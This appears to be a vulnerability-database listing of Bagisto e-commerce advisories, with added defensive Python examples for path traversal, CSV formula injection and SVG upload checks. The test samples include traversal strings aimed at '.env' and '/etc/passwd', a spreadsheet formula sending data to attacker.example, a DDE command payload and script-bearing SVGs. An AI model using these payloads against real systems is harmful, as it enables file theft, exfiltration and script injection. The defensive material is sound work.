25 matches found
CVE-2026-9506
This vulnerability exists in Bagisto due to improper validation of user-supplied input in the ImageCacheController component. An unauthenticated remote attacker could exploit this vulnerability by sending crafted path traversal sequences through the filename parameter to access arbitrary files...
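The check a reviewer would want for this class of bug, as an added example that is not Bagisto's own PHP handler: a resolver in the vulnerable shape the advisory describes (filename joined onto the cache root without validation) beside a hardened one. The cache root, the function names and the sample filenames are assumptions made for this example.

```python
"""
Added example (not Bagisto's code): an image-cache path resolver in the
vulnerable shape the advisory describes, beside a hardened one. The cache
root, function names and sample filenames are assumptions for this example.
"""
import posixpath
from urllib.parse import unquote

CACHE_ROOT = "/var/www/bagisto/storage/cache"  # assumed location


class PathTraversal(ValueError):
    """Raised when a user-supplied filename would leave CACHE_ROOT."""


def resolve_vulnerable(filename: str) -> str:
    # The pattern the advisory describes: the filename parameter is joined
    # onto the cache root without validation, so "../../.env" walks out of it.
    return posixpath.join(CACHE_ROOT, filename)


def where_vulnerable_lands(filename: str) -> str:
    # What the filesystem actually opens for the unchecked join.
    return posixpath.normpath(resolve_vulnerable(filename))


def resolve_hardened(filename: str) -> str:
    # Decode once so "%2e%2e%2f" is seen as "../"; if decoding again changes
    # the value the input was double-encoded, which a cache key never needs.
    decoded = unquote(filename)
    if unquote(decoded) != decoded:
        raise PathTraversal("double-encoded filename")
    if "\x00" in decoded:
        raise PathTraversal("NUL byte in filename")
    # Absolute paths and backslashes are never legitimate cache keys.
    if decoded.startswith("/") or "\\" in decoded:
        raise PathTraversal("absolute path or backslash")
    # Normalise the relative part first so "a/../../x" collapses to "../x".
    relative = posixpath.normpath(decoded)
    if relative in ("", ".", "..") or relative.startswith("../"):
        raise PathTraversal("traversal or empty path")
    # Then re-check containment on the joined absolute path. This is the one
    # check that must survive even if every earlier one is refactored away.
    candidate = posixpath.normpath(posixpath.join(CACHE_ROOT, relative))
    if posixpath.commonpath([CACHE_ROOT, candidate]) != CACHE_ROOT:
        raise PathTraversal("resolved path escapes cache root")
    return candidate


def is_safe_filename(filename: str) -> bool:
    try:
        resolve_hardened(filename)
    except PathTraversal:
        return False
    return True


# Constructed inputs: a legitimate cache key and the kind of "crafted path
# traversal sequences" the advisory refers to.
SAMPLES = [
    "product/1.jpg",
    "../../.env",
    "..%2f..%2f.env",
    "%252e%252e%252f.env",
    "images/../../../etc/passwd",
    "/etc/passwd",
]

if __name__ == "__main__":
    for name in SAMPLES:
        print(f"{name!r:32} unchecked join opens {where_vulnerable_lands(name)}")
        print(f"{'':32} hardened: {'ok' if is_safe_filename(name) else 'rejected'}")
```

The containment check against the normalised absolute path is the one that matters; the earlier rejections only give better error messages. A stricter variant allowlists the cache key format outright (for example `[A-Za-z0-9_/.-]+` with no `..` segment), which is simpler to reason about than a denylist.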
CVE-2026-6745
A vulnerability was determined in Bagisto up to 2.3.15. An unknown function of the Custom Scripts Handler component is affected. The manipulation causes cross-site scripting. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may...
CVE-2026-6744
A vulnerability was found in Bagisto up to 2.3.15. The copy function of the Downloadable Link Handler component is affected. The manipulation results in server-side request forgery (SSRF). The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted...
PT-2026-34047
Name of the vulnerable software and affected versions: Bagisto versions prior to 2.3.16. Description: An issue exists in the Custom Scripts Handler component that allows cross-site scripting. This flaw enables remote exploitation through the manipulation of an unknown functionality within the...
CVE-2019-16403
In Webkul Bagisto before 0.1.5, the functions that let customers change their own records (address, reviews, orders, etc.) can also be used by other customers to manipulate those records...
CVE-2026-21450
Bagisto is an open source Laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via the type parameter, which can lead to remote code execution or other exploitation. Version 2.3.10 fixes the issue...
Bagisto SSTI vulnerability in type parameter can lead to RCE
Summary: SSTI is possible in Bagisto via the type parameter and can lead to RCE and other exploitation. Details: 1. Go to http://127.0.0.1:8000/admin/reporting/products/view?type=77 Impact: Can lead to RCE, command injection...
Cross-site Scripting (XSS)
Bagisto is vulnerable to Cross-site Scripting XSS. The vulnerability is due to insufficient validation of uploaded files in the TinyMCE image upload functionality, which allows an attacker with sufficient privileges to upload a crafted HTML file containing JavaScript that executes in a user’s...
Webkul Software Bagisto security vulnerability
Webkul Software Bagisto is an open source e-commerce framework from Webkul Software, India. A security vulnerability exists in Webkul Software Bagisto versions prior to 2.3.8, which stems from incorrect handling of spreadsheet formula characters and could lead to data exfiltration and remote...
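The fix this entry implies, as an added example that is not Bagisto's code: neutralising spreadsheet formula characters before they reach a CSV export. The row layout, the function names and the customer records are constructed for this example.

```python
"""
Added example (not Bagisto's code): neutralising spreadsheet formula
characters in a CSV export. Row layout and records are constructed.
"""
import csv
import io

# Characters that Excel, LibreOffice and Google Sheets treat as the start of a
# formula (or a DDE command) when a CSV cell is imported.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def looks_like_formula(value: str) -> bool:
    # Leading whitespace does not stop evaluation, so look past it.
    return value.lstrip().startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Return the value in a form spreadsheets will not evaluate."""
    if not isinstance(value, str) or not looks_like_formula(value):
        return value
    # A leading apostrophe forces the cell to be read as text. The csv module
    # double-quotes the field and doubles any embedded quotes, which also
    # stops a payload from closing the field early and starting a new one.
    return "'" + value


def export_rows(rows, fieldnames):
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k, "")) for k in fieldnames})
    return buf.getvalue()


# Constructed records: a normal customer and three payloads of the kind that
# reach an admin export through a self-service profile or review form.
SAMPLE_ROWS = [
    {"name": "Alice Example", "email": "alice@example.test"},
    {"name": '=HYPERLINK("http://attacker.example/?"&A1,"open")',
     "email": "b@example.test"},
    {"name": "-2+3+cmd|' /C calc'!A0", "email": "c@example.test"},
    {"name": "   @SUM(1+1)", "email": "d@example.test"},
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS, ["name", "email"]))
```

Two caveats: the apostrophe is visible in some viewers, so columns that are genuinely numeric (prices, quantities) should be written as numbers rather than strings so they are never prefixed; and this protects the spreadsheet user, not the server, so it complements rather than replaces input validation on the forms that feed the export.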
Webkul Software Bagisto security vulnerability
Webkul Software Bagisto is an open source e-commerce framework from Webkul Software, India. A security vulnerability exists in Webkul Software Bagisto version 2.3.7, which stems from the server-side template engine processing unsanitized user input, and could lead to server-side template injection...
Webkul Software Bagisto security vulnerability
Webkul Software Bagisto is an open source e-commerce framework from the Indian company Webkul Software. A security vulnerability exists in Webkul Software Bagisto version 2.3.7, which stems from the TinyMCE image upload feature that allows the upload of specially crafted SVG files, which could le...
Bagisto is vulnerable to XSS through Admin Panel's product creation path
An authenticated stored XSS vulnerability exists in the Bagisto 2.3.6 admin panel's product creation path, allowing an attacker to upload a crafted SVG file containing malicious JavaScript code. This vulnerability can be exploited by an authenticated admin user to execute arbitrary JavaScript in...
CVE-2025-56426
An issue in WebKul Bagisto v2.3.6 allows a remote attacker to execute arbitrary code via the Cart/Checkout API endpoint; specifically, the price calculation logic fails to validate quantity inputs properly...
EUVD-2024-0328
Malicious code in bioql PyPI...
EUVD-2023-37726
Malicious code in bioql PyPI...
EUVD-2025-17448
Malicious code in bioql PyPI...
CVE-2025-40675
A Reflected Cross-Site Scripting XSS vulnerability has been found in Bagisto v2.0.0. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending the victim a malicious URL using the parameter 'query' in '/search'. This vulnerability can be exploited to stea...
CVE-2023-36236
Cross Site Scripting vulnerability in Webkul Bagisto v1.5.0 and before allows an attacker to execute arbitrary code via a crafted SVG file upload...
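The TinyMCE HTML upload entry, the two SVG upload entries for 2.3.7 and 2.3.6, and CVE-2023-36236 above all come down to the same missing check: the uploaded bytes are never inspected for script before being stored and served. As an added example that is not Bagisto's code, a content check that rejects HTML masquerading as an image and SVG carrying script, event handlers, `javascript:` links or DTD entities. The sample files are constructed for this example.

```python
"""
Added example (not Bagisto's code): an upload content check for SVG images
that rejects HTML disguised as an image and SVG carrying script. The sample
files are constructed for this example.
"""
import xml.etree.ElementTree as ET

# Elements that can run script or pull in foreign content inside an SVG.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object",
               "animate", "set", "handler"}
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")


def local_name(qualified: str) -> str:
    # ElementTree writes namespaced names as "{uri}name"; keep the local part.
    return qualified.rsplit("}", 1)[-1].lower()


def inspect_svg(data: bytes) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    # Refuse DTDs outright: an icon never needs entities, and rejecting them
    # before parsing means the stdlib parser never has to expand one.
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        return ["DOCTYPE or entity declaration present"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if local_name(root.tag) != "svg":
        # e.g. an .html file uploaded under an image extension
        return [f"root element is <{local_name(root.tag)}>, not <svg>"]
    findings = []
    for element in root.iter():
        tag = local_name(element.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        if tag == "style" and element.text and (
                "@import" in element.text or "url(" in element.text):
            findings.append("<style> with external reference")
        for attr, value in element.attrib.items():
            name = local_name(attr)
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name in ("href", "src") and \
                    value.strip().lower().startswith(DANGEROUS_SCHEMES):
                scheme = value.strip().split(":", 1)[0].lower()
                findings.append(f"{name} uses {scheme}: scheme on <{tag}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not inspect_svg(data)


# Constructed samples: one benign icon and five variants of what the
# advisories describe.
BENIGN = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
          b'<circle cx="5" cy="5" r="4"/></svg>')
SCRIPT = (b'<svg xmlns="http://www.w3.org/2000/svg">'
          b'<script>alert(document.cookie)</script></svg>')
ONLOAD = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">'
          b'<rect width="1" height="1"/></svg>')
JSHREF = (b'<svg xmlns="http://www.w3.org/2000/svg" '
          b'xmlns:xlink="http://www.w3.org/1999/xlink">'
          b'<a xlink:href="javascript:alert(1)"><text>click</text></a></svg>')
HTML_DISGUISED = b'<html><body><script>alert(1)</script></body></html>'
ENTITY = (b'<!DOCTYPE svg [<!ENTITY e "x">]>'
          b'<svg xmlns="http://www.w3.org/2000/svg">&e;</svg>')

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN), ("script", SCRIPT),
                        ("onload", ONLOAD), ("jshref", JSHREF),
                        ("html", HTML_DISGUISED), ("entity", ENTITY)]:
        print(f"{label:8} {inspect_svg(blob) or 'ok'}")
```

This is a denylist, so treat it as a gate rather than a sanitizer: the robust options are rasterising uploaded SVG server-side, or serving the original bytes from a separate origin with `Content-Disposition: attachment` and a restrictive Content-Security-Policy so that any script that slips through never runs in the admin origin. For production XML parsing prefer `defusedxml` over the stdlib parser.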
CVE-2023-36237
Cross Site Request Forgery vulnerability in Bagisto before v.1.5.1 allows an attacker to execute arbitrary code via a crafted HTML script...
CVE-2023-33570
Bagisto v1.5.1 is vulnerable to Server-Side Template Injection SSTI...